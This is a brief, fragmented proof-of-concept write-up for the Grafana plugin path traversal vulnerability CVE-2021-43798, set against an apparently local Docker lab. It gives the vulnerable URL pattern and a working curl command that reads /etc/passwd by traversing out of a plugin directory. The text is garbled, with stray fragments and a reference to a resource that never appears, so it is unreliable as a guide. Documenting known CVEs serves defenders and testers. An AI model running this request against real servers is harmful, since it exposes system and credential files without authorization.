
Proof-of-concept exploit for Grafana path traversal vulnerability (CVE-2021-43798) allowing unauthorized file read via directory traversal in plugin paths.
../.
<grafana_host_url>/public/plugins/<plugin_id>/, where <plugin_id> is the ID of the installed plugin. The vulnerable path can be identified through the following resource:
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd was used to access /etc/passwd.
../).